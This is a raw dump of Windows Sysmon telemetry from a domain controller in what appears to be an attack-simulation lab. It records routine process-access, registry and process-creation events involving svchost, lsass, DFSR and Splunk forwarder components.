10341000x800000000000000030398Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030397Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030396Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030395Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030394Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030393Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030392Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030391Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:24.868{7901BC46-4987-6008-0D00-00000000A301}996484C:\Windows\system32\svchost.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030418Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:25.821{7901BC46-4985-6008-0B00-00000000A301}856912C:\Windows\system32\lsass.exe{7901BC46-4982-6008-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000030420Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:27.681{7901BC46-4987-6008-1600-00000000A301}15365576C:\Windows\system32\svchost.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030419Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:27.681{7901BC46-4987-6008-1600-00000000A301}15365576C:\Windows\system32\svchost.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030421Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:40.524{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030423Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:46.227{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030422Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:46.227{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030424Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:07:47.383{7901BC46-4987-6008-0D00-00000000A301}9961420C:\Windows\system32\svchost.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000030427Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:08:01.664{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x800000000000000030426Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:08:01.648{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\32DFA675-0D71-42BD-A7E4-DA19B09BA9BB\Config SourceDWORD (0x00000001) 13241300x800000000000000030425Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:08:01.648{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\32DFA675-0D71-42BD-A7E4-DA19B09BA9BB\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_32DFA675-0D71-42BD-A7E4-DA19B09BA9BB.XML 10341000x800000000000000030444Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.961{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5567-6008-E306-00000000A301}7444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030443Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.961{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030442Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.961{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030441Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.961{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030440Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.961{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030439Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.961{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5567-6008-E306-00000000A301}7444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030438Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.961{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-5567-6008-E306-00000000A301}7444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030437Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.961{7901BC46-5567-6008-E306-00000000A301}7444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030436Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.429{7901BC46-5567-6008-E206-00000000A301}79723720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030435Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.289{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5567-6008-E206-00000000A301}7972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030434Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.289{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030433Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.289{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030432Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:08:07.289{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030431Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 